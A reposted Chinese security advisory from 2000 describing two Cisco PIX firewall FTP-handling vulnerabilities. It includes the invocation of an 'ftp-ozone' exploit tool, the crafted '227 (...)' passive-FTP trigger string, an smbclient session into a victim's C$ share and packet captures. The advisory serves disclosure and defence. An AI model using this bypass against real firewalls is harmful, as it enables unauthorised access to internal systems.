分享
 
 
 

PIX防火墙FTP漏洞允许非法通过防火墙

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

发布日期: 2000-3-24

更新日期: 2000-3-24

受影响的系统: CISCO Secure PIX Firewall Software version 4.2(5)

CISCO Secure PIX Firewall Software version 4.4(4)

CISCO Secure PIX Firewall Software version 5.0(3)

描述:

------------------------------------------------------------

The Cisco Secure PIX Firewall 在处理FTP命令时存在问题,导致恶意用户可以穿过防火墙 访问内部资源。这里有两个相关漏洞,这两个漏洞都可以用来不经认证就通过防火墙传输信息.

1.

CISCO PIX防火墙存在被动FTP安全漏洞。如果PIX后面配置了一台DMZ(非军事区)FTP服务器,允许由外往内的被动FTP的话,攻击者可以首先发送一个"227 xxx,xxx,xxx,xx,

prt1,prt2)" 命令的ip包给PIX,FTP服务器将返回一个错误信息,其中会包含"227 (..."字符串,由于缺少正确的检查,PIX会误以为FTP服务器正在开始一个被动FTP传输,PIX就会临时得 创建一条联 往内部FTP服务器指定端口(通过prt2指定)的通道,攻击者可以通过这条通道穿越 防火墙访问 到内部FTP主机的任意端口,甚至是低端口或者一些众所周知的端口。

这个问题在于'fixup protocol ftp'设置的问题,如果禁止这条命令,这个漏洞就 会失效。

但是这样将导致从外部连往内部的FTP client不能使用被动FTP。

2.

当防火墙内部的客户浏览外部服务器时,当点击某个链接后,防火墙会将其解释成 两个或者更 多的FTP命令。客户除了执行一个正常的FTP连接外,还会执行另外的几个FTP命令 打开一个特别 的FTP连接,允许恶意用户穿过防火墙访问内部客户资源。

测试程序:

------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

下面是针对第一个漏洞的攻击分析:

------Exploit Launched--------

[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139

220 victim Microsoft FTP Service (Version 4.0).

Garbage packet contains:

500 '..................................................................

.........................................................

Money packet contains:

227 (10,1,2,3,0,139)': command not understood

-------------Opened port connected (NBT)-------

[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator

Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0

Password: ********

Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]

smb: \ dir

AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58

2000

boot.ini ASR 279 Mon Mar 13 03:15:07

2000

CONFIG.SYS A 0 Mon Mar 13 03:22:58

2000

IO.SYS AHSR 0 Mon Mar 13 03:22:58

2000

MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58

2000

MSSCE D 0 Tue Mar 7 14:29:57

2000

NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49

2000

ntldr AHSR 156496 Tue Mar 7 11:47:49

2000

pagefile.sys A1073741824 Tue Mar 7 11:51:51

2000

Program Files D 0 Tue Mar 7 11:35:11

2000

RECYCLER DHS 0 Mon Mar 13 09:35:51

2000

TEMP DA 0 Tue Mar 7 14:36:31

2000

WINNT D 0 Tue Mar 7 14:30:05

2000

64706 blocks of size 65536. 43841 blocks available

smb: \ quit

-snip--

我们能看到,在执行了攻击程序ftp-zone后,现在我们可以连到目标主机的

139/tcp端口了,

并且可以访问共享目录。

而如果PIX设置了'logging console debug'选项,我们只能看到一个到21端口的连

接:

302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr

10.1.2.3/21 laddr 192.168.205.2/21

攻击者IP: 10.1.2.4

PIX IP: 10.1.2.3

内部IP: 192.168.205.2

PIX通过NAT将内部主机192.168.205.2的21端口映射到10.1.2.3的21端口上。

下面是通过tcpdump抓到的包,

在第11个包中,我们可以看到触发PIX不安全动作的字符串就是:

"227 (10,1,2,3,0,139)': command not understood."

PIX误以为,现在FTP server正在打开一个被动ftp的连接,目的端口在139,源端口

是任意的。

这证明,PIX在创建一个动态被动FTP连接前,只是检查是否在包的开头包含

"227 (xxx,xxx,xxx,xxx,prt,prt)"字符串。

Packet 1

Timestamp: 15:02:37.130283

Source Ethernet Address: 00:50:04:28:FE:EB

Destination Ethernet Address: 00:D0:B7:0E:18:AB

Encapsulated Protocol: IP

IP Header

Version: 4

Header Length: 20 bytes

Service Type: 0x00

Datagram Length: 60 bytes

Identification: 0x04CF

Flags: MF=off, DF=on

Fragment Offset: 0

TTL: 64

Encapsulated Protocol: TCP

Header Checksum: 0x1D4C

Source IP Address: 10.1.2.4

Destination IP Address: 10.1.2.3

TCP Header

Source Port: 1139 ()

Destination Port: 21 (ftp)

Sequence Number: 1818403974

Acknowledgement Number: 0000000000

Header Length: 40 bytes (data=0)

Flags: URG=off, ACK=off, PSH=off

RST=off, SYN=on, FIN=off

Window Advertisement: 128 bytes

Checksum: 0x78CB

Urgent Pointer: 0

TCP Data

-----------------------------------------------------------------

Packet 2

Timestamp: 15:02:37.130720

Source Ethernet Address: 00:D0:B7:0E:18:AB

Destination Ethernet Address: 00:50:04:28:FE:EB

Encapsulated Protocol: IP

IP Header

Version: 4

Header Length: 20 bytes

Service Type: 0x00

Datagram Length: 44 bytes

Identification: 0x4311

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有